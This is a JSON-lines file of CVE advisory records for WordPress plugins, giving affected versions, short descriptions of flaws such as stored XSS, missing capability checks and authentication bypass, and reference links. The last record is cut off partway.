{"CVE_ID":"CVE-2023-0365","slug":"react-webcam","versionImpact":"1.2.0","description":"The React Webcam WordPress plugin through 1.2.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d268d7a3-82fd-4444-bc0e-27c7cc279b5a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d268d7a3-82fd-4444-bc0e-27c7cc279b5a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2083","slug":"essential-blocks","versionImpact":"4.0.6","description":"The Essential Blocks plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on the save function in versions up to, and including, 4.0.6. This makes it possible for subscriber-level attackers to save plugin settings. While a nonce check is present, it is only executed when a nonce is provided. Not providing a nonce results in the nonce verification to be skipped. There is no capability check.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8bf0933-1c97-4374-b323-c55b91fe4d27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8bf0933-1c97-4374-b323-c55b91fe4d27?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1368","slug":"wp-page-duplicator","versionImpact":"0.1.1","description":"The Page Duplicator plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the duplicate_dat_page() function in all versions up to, and including, 0.1.1. This makes it possible for unauthenticated attackers to duplicate arbitrary posts and pages.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcc10e91-4810-4a0d-919c-de3e87137f76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcc10e91-4810-4a0d-919c-de3e87137f76?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-page-duplicator\\\/trunk\\\/page-duplicator.php#L136\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-page-duplicator\\\/trunk\\\/page-duplicator.php#L136\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2922","slug":"themesflat-addons-for-elementor","versionImpact":"2.1.1","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via widget tags in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1516280e-796e-4011-b15f-b754860ad414?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1516280e-796e-4011-b15f-b754860ad414?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themesflat-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themesflat-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9119","slug":"svg-complete","versionImpact":"1.0.2","description":"The SVG Complete plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f8e1495-c5e1-4bb9-92e9-b27b9b997a5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f8e1495-c5e1-4bb9-92e9-b27b9b997a5f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-complete\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-complete\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10057","slug":"rss-feed-widget","versionImpact":"2.9.9","description":"The RSS Feed Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's rfw-youtube-videos shortcode in all versions up to, and including, 2.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b77ea258-dced-4c36-bd0d-8977a347d1c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b77ea258-dced-4c36-bd0d-8977a347d1c9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rss-feed-widget\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rss-feed-widget\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170773\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170773\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11015","slug":"sign-in-with-google","versionImpact":"1.8.0","description":"The Sign In With Google plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.8.0. This is due to the 'authenticate_user' function not implementing sufficient null value checks when setting the access token and user information. This makes it possible for unauthenticated attackers to log in as the first user who has signed in using Google OAuth, which could be the site administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sign-in-with-google\\\/trunk\\\/src\\\/admin\\\/class-sign-in-with-google-admin.php#L525\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sign-in-with-google\\\/trunk\\\/src\\\/admin\\\/class-sign-in-with-google-admin.php#L525\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afe894b0-5e91-4aa2-bbd1-1f74274701cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afe894b0-5e91-4aa2-bbd1-1f74274701cf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11915","slug":"rrdevs-for-elementor","versionImpact":"1.1.0","description":"The RRAddons for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.1.0 via the Popup block due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rrdevs-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rrdevs-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f7e300f-06b5-4f59-9deb-9771bf86a204?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f7e300f-06b5-4f59-9deb-9771bf86a204?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12444","slug":"wp-dispensary","versionImpact":"4.5.0","description":"The WP Dispensary plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpd_menu' shortcode in all versions up to, and including, 4.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-dispensary\\\/trunk\\\/admin\\\/wp-dispensary-shortcodes.php#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-dispensary\\\/trunk\\\/admin\\\/wp-dispensary-shortcodes.php#L256\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-dispensary\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-dispensary\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13753c4d-1b51-4db2-a69e-523857a50e55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13753c4d-1b51-4db2-a69e-523857a50e55?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13579","slug":"wp-asambleas","versionImpact":"2.85.0","description":"The WP-Asambleas plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'polls_popup' shortcode in all versions up to, and including, 2.85.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-asambleas\\\/trunk\\\/modules\\\/shortcodes.php#L999\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-asambleas\\\/trunk\\\/modules\\\/shortcodes.php#L999\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ad542c9-2025-4875-bd37-f42095c058bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ad542c9-2025-4875-bd37-f42095c058bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13923","slug":"order-import-export-for-woocommerce","versionImpact":"2.6.0","description":"The Order Export & Order Import for WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.6.0 via the validate_file() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L175\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L175\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/order-import-export-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/order-import-export-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3283b3ff-1787-466b-9517-84bd715e4165?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3283b3ff-1787-466b-9517-84bd715e4165?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4473","slug":"frontend-dashboard","description":"The Frontend Dashboard plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the ajax_request() function in versions 1.0 to 2.2.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to control where the plugin sends outgoing emails. By pointing SMTP to their own server, attackers could capture password reset emails intended for administrators, and elevate their privileges for full site takeover.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/function-admin.php#L3055\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/function-admin.php#L3055\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/layout\\\/settings_tab\\\/email\\\/class-fed-email.php#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/layout\\\/settings_tab\\\/email\\\/class-fed-email.php#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/route\\\/class-fed-request.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/route\\\/class-fed-request.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290623\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290623\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frontend-dashboard\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frontend-dashboard\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f3a10b5-b024-4b3f-af67-b7fcb997d368?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f3a10b5-b024-4b3f-af67-b7fcb997d368?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5812","slug":"vgw-metis","versionImpact":"2.0.0","description":"The VG WORT METIS plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the gutenberg_save_post() function in all versions up to, and including, 2.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update limited post settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vgw-metis\\\/trunk\\\/classes\\\/admin.php#L422\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vgw-metis\\\/trunk\\\/classes\\\/admin.php#L422\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9edcbdc-5b01-4880-95ec-57d87ccbb472?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9edcbdc-5b01-4880-95ec-57d87ccbb472?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7959","slug":"station-pro","versionImpact":"2.4.2","description":"The Station Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 and \u2018height\u2019 parameters in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/station-pro\\\/tags\\\/2.4.2\\\/core\\\/inc\\\/player\\\/class-station-player.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/station-pro\\\/tags\\\/2.4.2\\\/core\\\/inc\\\/player\\\/class-station-player.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/station-pro\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/station-pro\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4026b41-29c3-4e0a-bf75-ae4ba47edb4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4026b41-29c3-4e0a-bf75-ae4ba47edb4f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2067","slug":"bulletin-announcements","versionImpact":"3.7.0","description":"The Announcement & Notification Banner \u2013 Bulletin plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce validation on the 'bulletinwp_update_bulletin_status', 'bulletinwp_update_bulletin', 'bulletinwp_update_settings', 'bulletinwp_update_status', 'bulletinwp_export_bulletins', and 'bulletinwp_import_bulletins' functions in versions up to, and including, 3.7.0. This makes it possible for unauthenticated attackers to modify the plugin's settings, modify bulletins, create new bulletins, and more, via a forged request granted they can trick a site's user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910991\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910991\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b808450f-0ebf-4c49-a9e3-f1c1f2b1f632?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b808450f-0ebf-4c49-a9e3-f1c1f2b1f632?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3122","slug":"gd-mail-queue","versionImpact":"3.9.3","description":"The GD Mail Queue plugin for WordPress is vulnerable to Stored Cross-Site Scripting via email contents in versions up to, and including, 3.9.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923988\\\/gd-mail-queue\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923988\\\/gd-mail-queue\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b668f45-c7fb-481b-bc8e-115e5b7248c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b668f45-c7fb-481b-bc8e-115e5b7248c9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4506","slug":"ldap-login-for-intranet-sites","versionImpact":"4.1.10","description":"The Active Directory Integration \/ LDAP Integration plugin for WordPress is vulnerable to LDAP Passback in versions up to, and including, 4.1.10. This is due to insufficient validation when changing the LDAP server. This makes it possible for authenticated attackers, with administrative access and above, to change the LDAP server and retrieve the credentials for the original LDAP server.","refs":"[{\"url\":\"https:\\\/\\\/medium.com\\\/%40cybertrinchera\\\/cve-2023-4506-cve-2023-4505-ldap-passback-on-miniorange-plugins-ca7328c84313\",\"name\":\"https:\\\/\\\/medium.com\\\/%40cybertrinchera\\\/cve-2023-4506-cve-2023-4505-ldap-passback-on-miniorange-plugins-ca7328c84313\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0585969d-dd08-4058-9d72-138a55a2cdf1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0585969d-dd08-4058-9d72-138a55a2cdf1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ldap-login-for-intranet-sites\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ldap-login-for-intranet-sites\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3023","slug":"announcekit","versionImpact":"2.0.9","description":"The AnnounceKit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0417e2d7-0c0a-48e1-bf18-3f5e16b1b8a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0417e2d7-0c0a-48e1-bf18-3f5e16b1b8a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/announcekit\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/announcekit\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1175","slug":"wp-recall","versionImpact":"16.26.6","description":"The WP-Recall \u2013 Registration, Profile, Commerce & More plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'delete_payment' function in all versions up to, and including, 16.26.6. This makes it possible for unauthenticated attackers to delete arbitrary payments.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b84b13a-b46c-48fc-a7a8-de32c575d576?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b84b13a-b46c-48fc-a7a8-de32c575d576?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-recall\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-recall\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9108","slug":"wechat-social-login","versionImpact":"1.3.0","description":"The Wechat Social login plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'convert_remoteimage_to_local' function in versions up to, and including, 1.3.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06881386-3c92-426b-948d-58e8a8bee624?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06881386-3c92-426b-948d-58e8a8bee624?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wechat-social-login\\\/trunk\\\/includes\\\/social\\\/class-xh-social-wp-api.php?rev=2111074#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wechat-social-login\\\/trunk\\\/includes\\\/social\\\/class-xh-social-wp-api.php?rev=2111074#L39\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10080","slug":"easy-post-types","versionImpact":"1.4.4","description":"The WP Easy Post Types plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post meta in versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bee1eeb-5354-47c9-9ae1-b1608d87d7bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bee1eeb-5354-47c9-9ae1-b1608d87d7bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L1622\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L1622\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10111","slug":"miniorange-login-with-eve-online-google-facebook","versionImpact":"6.26.3","description":"The OAuth Single Sign On \u2013 SSO (OAuth Client) plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 6.26.3. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username and the user does not have an already-existing account for the service returning the token.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/miniorange-login-with-eve-online-google-facebook\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/miniorange-login-with-eve-online-google-facebook\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddd83877-739f-4c21-8179-20de8bbc4936?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddd83877-739f-4c21-8179-20de8bbc4936?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11892","slug":"accordion-slider-lite","versionImpact":"1.5.1","description":"The Accordion Slider Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'accordion_slider' shortcode in all versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 